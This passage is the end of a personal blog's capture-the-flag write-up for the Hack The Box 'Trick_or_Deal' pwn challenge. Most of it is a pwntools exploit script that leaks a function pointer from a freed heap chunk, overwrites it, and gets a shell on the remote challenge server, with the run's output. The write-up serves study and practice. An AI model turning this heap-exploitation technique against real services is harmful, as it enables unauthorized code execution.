</span></span><span style="display:flex;"><span><span style="color:#75715e"># NX:       NX enabled</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># PIE:      PIE enabled</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># RUNPATH:  b&#39;./glibc/&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Helper functions</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">free</span>():
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What do you want to do?&#39;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;4&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">malloc</span>(size, data):
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What do you want to do?&#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;3</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>)
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] Are you sure that you want to make an offer(y/n): &#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;y</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>)
</span></span><span style="display:flex;"><span>    
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] How long do you want your offer to be?&#39;</span>, <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>size<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span><span style="color:#f92672">.</span>encode())
</span></span><span style="display:flex;"><span>    io<span style="color:#f92672">.</span>sendafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What can you offer me? &#39;</span>, data)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Exploit code</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io <span style="color:#f92672">=</span> start()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>free()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># We don&#39;t overwrite the function pointer so that we can leak it.</span>
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x48</span> <span style="color:#f92672">*</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Y&#39;</span>
</span></span><span style="display:flex;"><span>malloc(<span style="color:#ae81ff">0x58</span>, payload)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Leak pointer</span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What do you want to do? &#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;1&#39;</span>)
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Y&#39;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x48</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>leak <span style="color:#f92672">=</span> u64(io<span style="color:#f92672">.</span>readline()[:<span style="color:#ae81ff">6</span>] <span style="color:#f92672">+</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\x00\x00</span><span style="color:#e6db74">&#39;</span>)
</span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;printStorage leak: </span><span style="color:#e6db74">{</span>hex(leak)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>unlock_storage <span style="color:#f92672">=</span> leak <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x319</span>
</span></span><span style="display:flex;"><span>log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;unlock_storage: </span><span style="color:#e6db74">{</span>hex(unlock_storage)<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># overwrite printStorage with unlock_storage</span>
</span></span><span style="display:flex;"><span>free()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;V&#39;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x48</span> <span style="color:#f92672">+</span> p64(unlock_storage)
</span></span><span style="display:flex;"><span>malloc(<span style="color:#ae81ff">0x50</span>, payload)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;[*] What do you want to do? &#39;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;1&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;id&#39;</span>)
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><p>Let&rsquo;s attack the remote server.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;">$ ./xpl.py REMOTE 64.227.46.56:32650
[<font color="#66D9EF"><b>*</b></font>] &apos;/home/hackthebox/challenge/pwn/Trick_or_Deal/trick_or_deal&apos;
    Arch:     amd64-64-little
    RELRO:    <font color="#A6E22E">Full RELRO</font>
    Stack:    <font color="#A6E22E">Canary found</font>
    NX:       <font color="#A6E22E">NX enabled</font>
    PIE:      <font color="#A6E22E">PIE enabled</font>
    RUNPATH:  <font color="#F92672">b&apos;./glibc/&apos;</font>
[<font color="#A6E22E"><b>+</b></font>] Opening connection to 64.227.46.56 on port 32650: Done
[<font color="#66D9EF"><b>*</b></font>] printStorage leak: 0x559901e00be6
[<font color="#66D9EF"><b>*</b></font>] unlock_storage: 0x559901e00eff
[<font color="#66D9EF"><b>*</b></font>] Switching to interactive mode

<blink><font color="#A6E22E">[*] Bruteforcing Storage Access Code . . .</font></blink>

<font color="#A6E22E"><b>* Storage Door Opened *</b></font>
uid=999(ctf) gid=999(ctf) groups=999(ctf)
<font color="#F92672"><b>$</b></font> ls
flag.txt  glibc  ld-2.31.so  libc-2.31.so  trick_or_deal
</code></pre></div>



</div>

        <footer class="post-footer clearfix"><div class="share">
    </div>
</footer>
    </article>
</div>

            </div>
        </div>

        <footer class="footer">
            <div class="container">
                <div class="site-title-wrapper">
                    <h1 class="site-title">
                        <a href="http://localhost:1313/">Olivier LASNE</a>
                    </h1>
                    <a class="button-square button-jump-top js-jump-top" href="#" aria-label="Back to Top">
                        <i class="fa fa-angle-up" aria-hidden="true"></i>
                    </a>
                </div>

                <p class="footer-copyright">
                    <span>&copy; 2025 / Powered by <a href="https://gohugo.io/">Hugo</a></span>
                </p>
                <p class="footer-copyright">
                    <span><a href="https://github.com/roryg/ghostwriter">Ghostwriter theme</a> By <a href="http://jollygoodthemes.com">JollyGoodThemes</a></span>
                    <span>/ <a href="https://github.com/jbub/ghostwriter">Ported</a> to Hugo By <a href="https://github.com/jbub">jbub</a></span>
                </p>
            </div>
        </footer>

        <script src="http://localhost:1313/js/jquery-1.11.3.min.js"></script>
        <script src="http://localhost:1313/js/jquery.fitvids.js"></script>
        <script src="http://localhost:1313/js/scripts.js"></script>
        
    </body>
</html>

